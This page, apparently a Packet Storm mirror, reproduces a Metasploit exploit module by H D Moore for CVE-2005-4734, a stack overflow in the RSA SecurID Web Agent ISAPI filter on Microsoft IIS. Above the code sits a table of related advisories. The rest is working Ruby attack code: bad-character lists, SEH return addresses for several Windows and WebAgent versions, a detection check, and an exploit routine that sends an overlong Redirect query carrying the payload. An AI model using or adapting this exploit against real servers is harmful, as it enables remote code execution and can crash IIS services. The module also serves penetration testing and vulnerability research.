Microsoft IIS ISAPI RSA WebAgent Redirect Overflow

🗓️ 26 Nov 2009 00:00:00Reported by H D MooreType

packetstorm🔗 packetstormsecurity.com👁 40 Views

Microsoft IIS ISAPI RSA WebAgent Redirect Overflo

Reporter	Title	Published	Views	Family All 11
Circl	CVE-2005-4734	20 Sep 201000:00	–	circl
Check Point Advisories	IIS RSA Authentication Agent for Web Redirect Buffer Overflow (CVE-2005-4734)	22 Nov 200900:00	–	checkpoint_advisories
CVE	CVE-2005-4734	19 Mar 200623:00	–	cve
Cvelist	CVE-2005-4734	19 Mar 200623:00	–	cvelist
Exploit DB	Microsoft IIS - ISAPI RSA WebAgent Redirect Overflow (Metasploit)	20 Sep 201000:00	–	exploitdb
Metasploit	Microsoft IIS ISAPI RSA WebAgent Redirect Overflow	26 Dec 200514:34	–	metasploit
NVD	CVE-2005-4734	31 Dec 200505:00	–	nvd
Saint	RSA SecurID Web Agent for IIS redirect buffer overflow	30 Nov 200500:00	–	saint
Saint	RSA SecurID Web Agent for IIS redirect buffer overflow	30 Nov 200500:00	–	saint
Saint	RSA SecurID Web Agent for IIS redirect buffer overflow	30 Nov 200500:00	–	saint

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow',  
'Description' => %q{  
This module exploits a stack overflow in the SecurID Web  
Agent for IIS. This ISAPI filter runs in-process with  
inetinfo.exe, any attempt to exploit this flaw will result  
in the termination and potential restart of the IIS service.  
  
},  
'Author' => [ 'hdm' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
['CVE', '2005-4734'],  
['OSVDB', '20151'],  
],  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f\x3a\x3b\x3c" +  
"\x3d\x3e\x3f\x40\x5c" + "Zz",  
'StackAdjustment' => -3500,  
  
},  
'Platform' => 'win',  
'Targets' =>   
[  
# Version-specific return addresses  
['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }],  
['RSA WebAgent 5.3', { 'Rets' => [ 992, 0x10010e89 ] }],  
  
# Generic return addresses  
['RSA WebAgent 5.2 on Windows 2000 English', { 'Rets' => [ 996, 0x75022ac4 ] }],  
['RSA WebAgent 5.3 on Windows 2000 English', { 'Rets' => [ 992, 0x75022ac4 ] }],  
  
['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', { 'Rets' => [ 996, 0x71ab1d54 ] }],  
['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', { 'Rets' => [ 992, 0x71ab1d54 ] }],  
  
['RSA WebAgent 5.2 on Windows XP SP2 English', { 'Rets' => [ 996, 0x71ab9372 ] }],  
['RSA WebAgent 5.3 on Windows XP SP2 English', { 'Rets' => [ 992, 0x71ab9372 ] }],  
  
['RSA WebAgent 5.2 on Windows 2003 English SP0', { 'Rets' => [ 996, 0x7ffc0638 ] }],  
['RSA WebAgent 5.3 on Windows 2003 English SP0', { 'Rets' => [ 992, 0x7ffc0638 ] }],  
],  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('URL', [ true, "The path to IISWebAgentIF.dll", "/WebID/IISWebAgentIF.dll" ]),  
], self.class)  
end  
  
def check  
r = send_request_raw({  
'uri' => datastore['URL'],  
'query' => 'GetPic?image=msf'  
}, -1)  
  
if (r and r.body and r.body =~ /RSA Web Access Authentication/)   
return Exploit::CheckCode::Detected  
end  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
  
pat = rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK  
seh = generate_seh_payload(target['Rets'][1])  
pat[target['Rets'][0]-4, seh.length] = seh  
  
r = send_request_raw({  
'uri' => datastore['URL'],  
'query' => 'Redirect?url=' + pat  
}, 5)  
  
handler  
disconnect  
end  
  
end`

26 Nov 2009 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.7245